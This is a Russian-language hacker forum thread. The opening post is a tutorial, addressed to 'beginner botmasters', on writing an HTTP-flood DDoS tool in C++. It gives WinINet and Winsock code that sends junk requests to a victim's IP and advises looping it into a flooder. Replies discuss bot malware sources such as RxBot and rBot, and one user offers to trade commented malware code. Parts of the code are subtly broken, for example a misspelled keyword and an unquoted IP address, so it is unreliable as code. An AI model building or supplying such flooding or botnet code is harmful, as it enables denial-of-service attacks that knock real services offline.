Принципы и практическая реализация DDoS атак

[Dr0ne]

эта статья писалась мной для езина xakepy, который был неочень удачным. но материал полезный и я думаю его стоит прочитать начинающим ботмастерам - пригодиться
===================================================
Принципы и практическая реализация DDoS атак

Я немного напомню про реализацию ДДос атак. Весь принцип основывается на том, что атакуемая машина перегружается левыми запросами, которые нужно обрабатывать и тратить свои ресурсы. И когда количество требуемых ресурсов выше, чем существует, то машина зависает. Я буду это реализовать на С++. Все что нам нужно, это посылка дынных на атакуемый сервер. Я буду в качестве цели использовать вэб сервер. Ну что, начнем пожалуй кодить. Для посылки данных вэб серверу можно использовать сокеты или wininet. Отправка дынных через wininet гараздо проще, чем через сокеты, но все же не будем этот способ отбрасывать и я покажу как это реализуется.

Отправка данных вебсереверу испльзуя wininet
для начала добавим к исходнику эти строчки:

#include <wininet.h>
#pragma comment(lib,"wininet.lib")

это необходимо для того чтобы использовать wininet. теперь определим "мусор", который мы будем посылать.

static TCHAR hdrs[] = _T("Content-Type: application/x-www-form-urlencoded");
   static TCHAR frmdata[] =_T("userid=1&passwd=qwerty");// здесь мы опрелеляем, что именно мы будем передавать
// мы передаем форме айди юзера равное 1 и его пароль qwerty
   statuc TCHAR accept[] =_T("Accept: */*");

Так, опреледившись, что мы будем передавать форме, нужно это передать серверу. Ну чтож приступим. Делается это очень легко:

HINTERNET hSession = InternetOpen("Ослик",INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
// открываем сессию
HINTERNET hConnect = InternetConnect(hSession, _T("Имя сервера, напр. microsoft.com"),INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 1);
// соединяемся с сервером
HINTERNET hRequest = HttpOpenRequest(hConnect, "POST",_T("Имя формы, которой мы будем передавать данные"), NULL, NULL, accept, 0, 1);
HttpSendRequest(hRequest, hdrs, strlen(hdrs), frmdata, strlen(frmdata));
// сама передача дынных форме.

Как все просто. С wininet разобрались, но есть еще способ через сокеты. Он конечно кривой, грамоздкий, но всеже заслуживает внимания.

Отправка данных вебсереверу испльзуя сокеты

Я буду использовать вторые сокеты. Теперь определим, что будем их использовать

#include <winsock2.h>
#pragma comment(lib,"ws2_32.lib")

Тепрь создадим "мусор":

char *RbcMessage[] =
{
"GET /index.php HTTP/1.1\r\n",
"Accept: */*\r\n",
"Referer: http://www.127.0.0.1.ru\r\n",
"Accept-Language: ru\r\n",
"Accept-Encoding: gzip, deflate\r\n",
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)\r\n",
"Host: www.google.com\r\n\r\n\r\n",
NULL
};
int iMsg = 0;

Теперь проинициализируем сокеты

WSADATA WSAData;
WSAStartup(MAKEWORD(2,2), &WSAData);
// вот здесь я прописываю что будет использоваться вторая версия сокетов.

Далее будет идти создание сокета и назначения ему пункта доставки нашего "мусора":

SOCKET sock;
sock = socket(AF_INET,SOCK_STREAM,0);

sockaddr_in sendsock;
sendsock.sin_family = AF_INET;
sendsock.sin_port = htons(80);
// 80 порт - порт веб сервера, но я надеюсь, что вы это знаете
sendsock.sin_addr.s_addr=inet_addr(127.0.0.1);
// прописываем ip адрес жертвы

C целью определились и теперь можно все это передавать

connect(sock,(LPSOCKADDR)&sendsock,sizeof(sendsock));
for(iMsg = 0;(RbcMessage[iMsg]); iMsg++)
send(sock, (LPSTR)RbcMessage, strlen(RbcMessage[iMsg]), 0);
closesocket(sock);

Ну вот и все. Если все это дело поставить на цикл, то можно получить неплахую програмульку для http флуда. Кстати, это не единственный вид флуда. Можно еще использовать icmp, syn, ask флуд. Но тут надо исползовать сырые сокеты, собирать пакет самому, создавать для него контрольные суммы и тд. Ах да чуть не забыл: Я не несу ответсвенности за использование этого материала в целях нарушающих УК вашей страны.
Удачного компилирования.
================================================
хотелось бы услышать отзывы о статье. если понравиться, то буду писать еще. в это сфере у меня много знаний и наработок

 

[Great]

1) Я тебя, наверное, разочарую, но ты подключал вторую версию сокетов, а использовал первую =)
2) Зачем слать HTTP-запрос частями, по строкам?

 

[gemaglabin]

но ты подключал вторую версию сокетов, а использовал первую =)

Я наверное тебя разочарую но он использовал вторую тк в винде wsock.dll второй версии и даже заместо send юзается WSASend

 

[Great]

gemaglabin
я разочаровался в смысле жизни. пойду вешаться :fie:

 

[SilverT]

отзывы о статье. если понравиться, то буду писать еще. в это сфере у меня много знаний и наработок

...статейка оччень понравилась, пиши пожалуйста еще, а и хотелось бы увидеть литературу(ну хотя бы название) которая может плмочь в этом деле, или которая помогла тебе...
...также приветствуется указание названий ботов, сорцы которых стоит посмотреть начинающим, дабы постигнуть все тонкости(ну или хотя бы не все, но побольше )...
кароч:

...АФФТАР, ПИШИ ИСЧО!!!

 

[Dr0ne]

единственно что у меня было когда я писал эту статейку это - RxBot. его можешь найти в топе выше - Вирусология -> сорцы ботов червей вирусов( непомню точное название). топ тот прикреплен

 

[SilverT]

...спасибо за ответ...

единственно что у меня было когда я писал эту статейку

...а из того что есть сейчас и находится в паблике???

 

[Dr0ne]

куча всего. ну и вопросики у тебя. самому лень посмотреть сорцы хотябы одного бота, а остальные все идентичны. поэтому не задавай таких вопросов

 

[SilverT]

ну и вопросики у тебя

...извини, просто я попытался ковырять rBot, а там вставки на асме, а я в нем 0, да и знания об irc орставляют желать лучшего, поэтому я пошел :bang: ...

куча всего

...я имею ввиду то, по чему лучше всего будет понять основы работы ботов...

 

[Cr4sh]

боян, тема заежженая и неинтиресная, к тому же на полноценную статью не тянет... и еще я не вьехал, причём здесь ДДоС-атаки?

 

[pro5to]

Cr4sh определил моментом :lol2:
SilverT - у меня есть работа горла (на сях) (с комментариями , защиту от кидисов поправил )
стучи в асю.. может махнёмся на что

 

[Dr0ne]

этой стать уже почти год, я сейчас сам на неё смотрю и вспоминаю каким я был)))
Cr4sh, pro5to все когда то были начинающими и мало чего знали. так что заканчиваем тут флейм

 

[BUG(O)R]

Dr0ne

Это называется критика, а не флейм, просто тут расписывать нечего, всю критику можно уложить в одно слово. Ты же не пишешь: "не флейми", людям, которые тебе говорят: "Вау, супер, дайте две..."

 

[nerezus]

татья / вообще / говорит как о знаниях автора, так и о умениях четко сформулировать мысль и донести ее общественности.

В хакере статьи портят. Это было замечено неоднократно
Например в "Точкистонском косяке" Морфеуса такого приписали...

 

[Dr0ne]

BUG(O)R
ты прав на счет критики. но я не про это.

SilverT - у меня есть работа горла (на сях) (с комментариями , защиту от кидисов поправил )
стучи в асю.. может махнёмся на что

это тут в тему? я думаю нет.

 

[pro5to]

Dr0ne я как добрехАцкер.. если люди не понимают ...
то я предлагаю довольно понятный код с комментариями и доработанный полностью. Раз ты в паблик свою приватную работку кидать не хочешь

 

[\xE9\x85\]

Cr4sh
+1

 

[SilverT]

у меня есть работа горла (на сях) (с комментариями , защиту от кидисов поправил )

...вот комментарии - это хорошо, а защиту я думаю и сам бы поправил(имхо)...
...а махнуться у меня пока нечем, как будет, обязательно стукну(ты это, к тому времени защиту-то на место верни, ОК???)...

 

[chiff]

Я наверное тебя разочарую но он использовал вторую тк в винде wsock.dll второй версии и даже заместо send юзается WSASend

сорри за оффтопик, но как я понял без разницы как писать, send или WSASend, connect или WSAConnect, но юзаться будет вторая версия винсока?

 

[Great]

а тебе не все равно?)